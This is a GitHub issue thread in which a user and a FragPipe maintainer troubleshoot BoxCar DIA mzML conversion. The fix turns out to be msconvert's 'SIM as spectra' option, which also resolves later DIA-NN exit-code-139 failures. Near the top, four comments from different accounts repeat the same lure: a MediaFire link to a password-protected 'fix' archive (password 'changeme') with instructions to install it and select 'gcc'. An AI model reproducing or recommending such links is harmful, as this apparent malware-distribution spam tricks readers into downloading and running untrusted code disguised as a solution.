### ISSUE TITLE
"No MS1 data" in BoxCar DIA file

### ISSUE THREAD

**Issue by a-indra** [Nesvilab/FragPipe#1756]
Hello!
I am trying to analyse some BoxCar DIA files that were generated on a Thermo instrument (Eclipse). FAIMS was used but only at one CV. The isolation windows are non-staggered (see table), and as such I converted the data to .mzml in MS Convert without demultiplexing. 

However, the analysis terminated at: _"There is no MS1 in <filepath>. DIA data search requires MS1 data."_

My suspicion is that I converted the files incorrectly resulting in the "No MS1" data error. Here are the options I have used:
![image](https://github.com/user-attachments/assets/2e8254fa-97db-4e5b-8b9d-90d26f93f72c)

Please let me know your advice. Any help will be greatly appreciated.
Thank you!

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns="http://www.w3.org/TR/REC-html40">

<head>

<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 15">
<link id=Main-File rel=Main-File
href="file:///C:/Users/ANUKIN~1/AppData/Local/Temp/msohtmlclip1/01/clip.htm">
<link rel=File-List
href="file:///C:/Users/ANUKIN~1/AppData/Local/Temp/msohtmlclip1/01/clip_filelist.xml">
<style>

</style>
</head>

<body link="#467886" vlink="#96607D">

Window | Center Mass (m/z) | z | MSX ID | Isolation Window (m/z) | Window start | Window end
-- | -- | -- | -- | -- | -- | --
BoxCar_1_1 | 367.5 | 1 | 1 | 35 | 350 | 385
BoxCar_2_1 | 398 | 1 | 2 | 28 | 384 | 412
BoxCar_3_1 | 422.5 | 1 | 3 | 23 | 411 | 434
BoxCar_1_2 | 444 | 1 | 1 | 22 | 433 | 455
BoxCar_2_2 | 464 | 1 | 2 | 20 | 454 | 474
BoxCar_3_2 | 483.5 | 1 | 3 | 21 | 473 | 494
BoxCar_1_3 | 503 | 1 | 1 | 20 | 493 | 513
BoxCar_2_3 | 522.5 | 1 | 2 | 21 | 512 | 533
BoxCar_3_3 | 542.5 | 1 | 3 | 21 | 532 | 553
BoxCar_1_4 | 562 | 1 | 1 | 20 | 552 | 572
BoxCar_2_4 | 582 | 1 | 2 | 22 | 571 | 593
BoxCar_3_4 | 603 | 1 | 3 | 22 | 592 | 614
BoxCar_1_5 | 624.5 | 1 | 1 | 23 | 613 | 636
BoxCar_2_5 | 647 | 1 | 2 | 24 | 635 | 659
BoxCar_3_5 | 670.5 | 1 | 3 | 25 | 658 | 683
BoxCar_1_6 | 695.5 | 1 | 1 | 27 | 682 | 709
BoxCar_2_6 | 723 | 1 | 2 | 30 | 708 | 738
BoxCar_3_6 | 754 | 1 | 3 | 34 | 737 | 771
BoxCar_1_7 | 789 | 1 | 1 | 38 | 770 | 808
BoxCar_2_7 | 827.5 | 1 | 2 | 41 | 807 | 848
BoxCar_3_7 | 873 | 1 | 3 | 52 | 847 | 899
BoxCar_1_8 | 932 | 1 | 1 | 68 | 898 | 966
BoxCar_2_8 | 1016.5 | 1 | 2 | 103 | 965 | 1068
BoxCar_3_8 | 1358.5 | 1 | 3 | 583 | 1067 | 1650

</body>

</html>

[log_2024-08-27_14-54-56.txt](https://github.com/user-attachments/files/16777616/log_2024-08-27_14-54-56.txt)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by a-indra** [comment]
Hi Fengchao,
My sincere apologies - I uploaded the incorrect log. Please see the relevant one here:
[aindra_log_2024-08-28_14-34-06.txt](https://github.com/user-attachments/files/16784769/aindra_log_2024-08-28_14-34-06.txt)

**Comment by fcyu** [comment]
No worries. Could you share the full screenshot of your msconvert?

Thanks,

Fengchao

**Comment by a-indra** [comment]
![image](https://github.com/user-attachments/assets/565ce612-d266-47fd-9b7e-541cfac03579)

**Comment by fcyu** [comment]
It looks OK. Could you share one of your raw files with us? I need to debug the program.

I can send you a Dropbox link to upload the file if you need.

Thanks,

Fengchao

**Comment by a-indra** [comment]
Of course - please send me link

**Comment by fcyu** [comment]
Sounds great. Here it is https://www.dropbox.com/request/8KDzLCPRbFnIfsDSZRmZ

Thanks,

Fengchao

**Comment by fcyu** [comment]
Hi @a-indra ,

I have received your mzML file. There are indeed no MS1

```xml
<run id="_x0031_9AUG24_AI_CHIVAS_68-1" defaultInstrumentConfigurationRef="IC1" startTimeStamp="2024-08-26T06:10:08Z" defaultSourceFileRef="RAW1">
  <spectrumList count="48768" defaultDataProcessingRef="pwiz_Reader_Thermo_conversion">
    <spectrum index="0" id="controllerType=0 controllerNumber=1 scan=4" defaultArrayLength="14">
      <cvParam cvRef="MS" accession="MS:1000580" name="MSn spectrum" value=""/>
      <cvParam cvRef="MS" accession="MS:1000511" name="ms level" value="2"/>
      <cvParam cvRef="MS" accession="MS:1000130" name="positive scan" value=""/>
      <cvParam cvRef="MS" accession="MS:1000127" name="centroid spectrum" value=""/>
      <cvParam cvRef="MS" accession="MS:1000504" name="base peak m/z" value="1970.162719726563" unitCvRef="MS" unitAccession="MS:1000040" unitName="m/z"/>
      <cvParam cvRef="MS" accession="MS:1000505" name="base peak intensity" value="3016.317138671875" unitCvRef="MS" unitAccession="MS:1000131" unitName="number of detector counts"/>
      <cvParam cvRef="MS" accession="MS:1000285" name="total ion current" value="37026.984375"/>
      <cvParam cvRef="MS" accession="MS:1001581" name="FAIMS compensation voltage" value="-45.0"/>
      <cvParam cvRef="MS" accession="MS:1000528" name="lowest observed m/z" value="207.846130371094" unitCvRef="MS" unitAccession="MS:1000040" unitName="m/z"/>
      <cvParam cvRef="MS" accession="MS:1000527" name="highest observed m/z" value="1992.800903320313" unitCvRef="MS" unitAccession="MS:1000040" unitName="m/z"/>
      <cvParam cvRef="MS" accession="MS:1000796" name="spectrum title" value="19AUG24_AI_CHIVAS_68-1.4.4.2 File:&quot;19AUG24_AI_CHIVAS_68-1.raw&quot;, NativeID:&quot;controllerType=0 controllerNumber=1 scan=4&quot;"/>
      <scanList count="1">
        <cvParam cvRef="MS" accession="MS:1000795" name="no combination" value=""/>
        <scan>
          <cvParam cvRef="MS" accession="MS:1000016" name="scan start time" value="0.0531152992" unitCvRef="UO" unitAccession="UO:0000031" unitName="minute"/>
```

As you can see, the first scan is MS2. I am not sure if it was due to the data acquisition or conversion. 

Could you upload the **raw** file for me to take a look?

Thanks,

Fengchao

**Comment by a-indra** [comment]
Hi Fengchao, 
I have uploaded the .raw file to the same dropbox link. Thank you very much for your help so far.

**Comment by fcyu** [comment]
Thank you for sharing the raw file. The reason of not having MS1 is because the MS1 spectra are SIM spectra. After checking "SIM as spectra" in msconvert, the mzML file is good now.

![image](https://github.com/user-attachments/assets/60e1d7ba-3028-4dca-b889-216c413aef97)

Best,

Fengchao

**Comment by a-indra** [comment]
Thank you, Fengchao. I will try that and report back.

**Comment by a-indra** [comment]
[log_2024-08-30_15-41-22.txt](https://github.com/user-attachments/files/16812441/log_2024-08-30_15-41-22.txt)

Hi Fengchao,
I tried to run a DIA analysis and Fragpipe exited unexpectedly. I am not sure what is causing the problem. Any ideas?

**Comment by a-indra** [comment]
[log_2024-08-30_16-13-47.txt](https://github.com/user-attachments/files/16812610/log_2024-08-30_16-13-47.txt)

Update: I tried the alternative DIA workflow (using DIA-Umpire) and it also terminated early.

**Comment by fcyu** [comment]
Similar to https://github.com/Nesvilab/FragPipe/issues/1741#issuecomment-2312776676 and https://github.com/Nesvilab/FragPipe/issues/810. Not enough memory.

According to your log file, FragPipe detected 220 GB free memory from the Linux, but I doubt that since there might be issues similar to https://github.com/Nesvilab/FragPipe/issues/1741#issuecomment-2312827206. Can you check how much memory the OS have access to?

Thanks,

Fengchao

**Comment by a-indra** [comment]
Hi Fengchao,
Thank you for your help. You were right. Defining the RAM within the 'Workflow' tab to an appropriate amount appeared to resolve the issue, and the job was completed:
[log_2024-08-31_09-52-44.txt](https://github.com/user-attachments/files/16842501/log_2024-08-31_09-52-44.txt)

However, when I tried to analyse the entire cohort of samples (~180 samples, as opposed to the 7 samples above), FragPipe exited at the quant stage:
```
[2:05] File #8/184
[2:05] Loading run /export/home/s2989264/local/chivas_mzml/AD_AI_Sample33_C18_22052023_7_20230606030500.mzML
Process 'DIA-NN' finished, exit code: 139
Process returned non-zero exit code, stopping

```
[log_2024-09-02_22-17-29.txt](https://github.com/user-attachments/files/16842522/log_2024-09-02_22-17-29.txt)


I then tried to re-perform quant in a separate run of FragPipe, but using the spectral library generated in the previous run. Only the DIA-NN tab was ticked, and I specified the relevant .speclib file, generated in the preivous run. I also set all input files to "DIA-Quant". It once again failed at the 8th file. Thinking this was an input file-specific issue, I removed that particular input file and tried again, but the same error was reproduced.
```
[2:21] File #8/183
[2:21] Loading run /export/home/s2989264/local/chivas_mzml/AD_AI_**Sample33**_C18_22052023_5.mzML
Process 'DIA-NN' finished, exit code: 139
Process returned non-zero exit code, stopping
```

Now, thinking it was an issue with all **Sample33**-related files, I removed them all. I also defined the threads in the 'Workflow' tab to 32, thinking maybe it was a processing/memory issue. Once again, DIA-NN exits at the 8th file:

```
[1:03] File #8/172
[1:03] Loading run /export/home/s2989264/local/chivas_mzml/AD_AI_Sample2_C18_22052023_5.mzML
Process 'DIA-NN' finished, exit code: 139
Process returned non-zero exit code, stopping
```
[log_2024-09-03_11-54-40.txt](https://github.com/user-attachments/files/16842535/log_2024-09-03_11-54-40.txt)

At this point, I am convinced that it is not an issue related to a specific input file, but something happening at the 8th file.
Finally, I tried setting the input files as "DIA" rather than "DIA-Quant", but this once again failed at the 8th file, with same exit code.

The last thing I have tried is running DIA-NN independently, albeit on a separate computer with a different version (1.9.1). While this didn't fail at the 8th file, it consistently reported 0 precursors in all samples, before I manually terminated the run:
[diannlog.txt](https://github.com/user-attachments/files/16842689/diannlog.txt)

Thank you for your ongoing help. I would really appreciate any advice you might have for how to resolve this DIA-NN / quant issue.

**Comment by fcyu** [comment]
`exit code: 139` means not enough memory which explains all your observations.

Best,

Fengchao

**Comment by a-indra** [comment]
Hi Fengchao, 
Thank you as always for your prompt response. 
I tried using the .tsv instead of .speclib in DIA-NN stand-alone, and again received the issue of 0 IDs:

`[0:16] Number of protein isoforms identified at 1% FDR: 0 (precursor-level), 0 (protein-level) (inference performed using proteotypic peptides only)`

[dianntsv.txt](https://github.com/user-attachments/files/16843156/dianntsv.txt)

I tried analysing only 7 input files, first using .speclib, then using .tsv, respectively. Both times it failed at the first file:
```
7 files will be processed
[0:00] Loading spectral library /export/home/s2989264/local/fragpipe_output/2SEP24_all_CHIVAS/library.tsv
[0:00] Spectral library loaded: 1327 protein isoforms, 1327 protein groups and 12122 precursors in 9863 elution groups.
[0:00] Initialising library
[0:00] Saving the library to /export/home/s2989264/local/fragpipe_output/2SEP24_all_CHIVAS/library.tsv.speclib

[0:00] File #1/7
[0:00] Loading run /export/home/s2989264/local/chivas_mzml/AD_AI_Sample10_C18_22052023_5.mzML
Process 'DIA-NN' finished, exit code: 139
Process returned non-zero exit code, stopping
```
[log_2024-09-03_13-43-50.txt](https://github.com/user-attachments/files/16843173/log_2024-09-03_13-43-50.txt)

**Comment by a-indra** [comment]
> exit code: 139 means not enough memory which explains all your observations.

I should add, I am accessing 240 GB of RAM, and manually setting 220 GB in FragPipe, in the Workflow tab. Is this insufficient for DIA-NN?

**Comment by a-indra** [comment]
Hi Fengchao,
I believe I have identified the problem. The first 7 files that would succeed are different from the remaining. These are the 7 files that were the subject of this post, originally. They had been converted to .mzml using the "SIM as spectra" checkbox option.

The remaining files were converted from .raw files generated without FAIMS and I did not use the "SIM as spectra" option when generating them. 

To summarise, among my cohort of ~180 samples there are two categories of files:

1. 7 were generated on Orbitrap Eclipse, with FAIMS (single CV)
2. ~170 were generated on Orbitrap Fusion, without FAIMS.

The files from the second category had successfully been analysed on DIA-NN 1.8, _using .raw files_, some time ago. They have recently been converted to .mzml using default settings in MSConvert - I did not use "SIM as spectra". FragPipe presumably has no issue with these files in the majority of the workflow, but DIA-NN seemingly cannot operate on them at the quant stage. All FragPipe runs exit with code 139, unless I exclusively use the 7 files from category 1 above.  

Here is an example of DIA-NN exiting when using only files from the second category:
[log_2024-09-03_15-00-56.txt](https://github.com/user-attachments/files/16844477/log_2024-09-03_15-00-56.txt)

The exact same workflow runs successfully until completion when using files exclusively from the first category:
[log_2024-09-03_16-35-45.txt](https://github.com/user-attachments/files/16844551/log_2024-09-03_16-35-45.txt)

So, the phenomena of failing at the '8th file' can be explained by the 7 input files being from the first category, and as soon as DIA-NN encounters a file from the second category, it exits. To me, this suggests there is some issue with the .mzml file rather than a memory issue. 

Thank you again for your ongoing help. Any advice you have about this would be greatly appreciated!

**Comment by fcyu** [comment]
> I tried using the .tsv instead of .speclib in DIA-NN stand-alone, and again received the issue of 0 IDs:

I am not sure what were changed in the standalone DIA-NN 1.9. I guess you need to use 1.8.1 at the moment.


> To summarise, among my cohort of ~180 samples there are two categories of files:
> 7 were generated on Orbitrap Eclipse, with FAIMS (single CV)
> ~170 were generated on Orbitrap Fusion, without FAIMS.
> The files from the second category had successfully been analysed on DIA-NN 1.8, using .raw files, some time ago. They have recently been converted to .mzml using default settings in MSConvert - I did not use "SIM as spectra". FragPipe presumably has no issue with these files in the majority of the workflow, but DIA-NN seemingly cannot operate on them at the quant stage. All FragPipe runs exit with code 139, unless I exclusively use the 7 files from category 1 above.

Thanks for the troubleshoot. Maybe you could share one of the files from the second category with me to take a look. I need both mzML and raw formats.

Best,

Fegnchao

**Comment by a-indra** [comment]
Hi Fengchao,
I used the "SIM as spectra" feature to convert the files from the second category, and I was able to perform DIA-NN quant on them (within FragPipe GUI) using the library.tsv file that had originally been created during the run that failed during the quant step. In essence, it seems files from both categories should have been converted in the same way, i.e. independent of FAIMS. Perhaps it is the boxcar approach, rather than inclusion of FAIMS, that warrants "SIM as spectra". 

I am currently running a fresh FragPipe analysis using the entire workflow (i.e. generating spectral library and then performing quant with DIA-NN). Hopefully this succeeds. 

Without understanding the "SIM as spectra" option, my hope is that including that option does not incur any performance cost in terms of IDs etc. I say this as my only point of comparison is using standalone DIA-NN with .raw files, and also Spectronaut with .raw files, which perhaps don't employ the "SIM as spectra" conversion that is seemingly necessary when generating .mzml files from these data. Are you able to comment?

Thank you again for all of your help, it is hugely appreciated. I will update you once this final run is finished and, if you're still interested, happy to share the 1) .raw files, 2) .mzml with default settings, 3) .mzml with 'SIM as spectra' enabled.

**Comment by fcyu** [comment]
Glad to hear that you have resolved the issue.

I don't know how DIA-NN and Spectronaut load the raw files, but this SIM thing is not rare and not related to FAIMS or BoxCar. I have seen a data without FAIMS and BoxCar have the SIM feature.

Best,

Fengchao
